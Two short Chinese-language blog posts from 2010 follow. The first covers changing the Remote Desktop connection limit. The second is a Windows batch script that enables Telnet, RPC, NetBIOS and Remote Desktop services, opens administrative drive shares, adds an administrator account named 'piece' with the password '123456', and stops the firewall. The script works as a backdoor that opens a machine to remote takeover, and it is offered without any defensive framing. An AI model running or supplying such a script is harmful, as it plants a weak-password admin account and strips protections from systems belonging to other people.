10月 19, 2010

修改遠端連線數

控制台->系統管理工具->遠端連線服務->遠端連線設定
對RDP-TCP右鍵->屬性-選網路設定(Network Adapter)
最大連線數預設為2

10月 14, 2010

用批次檔開啟+23+135+139+3389端口++share+幾個分享


@echo 開啟telnet服務(自動)23端口
sc config TlntSvr start= AUTO
net start telnet

@echo 開啟RPC遠程過程調用(自動)135端口
sc config RpcLocator start= AUTO
net start rpclocator

@echo 開啟NetBIOS Session Service服務(自動)139端口
@echo (TCP/IP NetBIOS 協助程序)
sc config LmHosts start= AUTO
net start lmhosts

@echo 開啟Terminal Services (終端機服務)(自動)3389端口
sc config TermService start= AUTO
net start termservice

@echo 開啟 C$共享 D$共享 ADMIN$共享 IPC$共享
net share C$=C:\
net share D$=D:\
net share ADMIN$
net share
net share netlogon

@echo 啟動一個用戶名為piece 密碼為123456 Admin權限
net user piece 123456 /add
net localgroup administrators piece /add
@echo 停止防火牆
net stop sharedaccess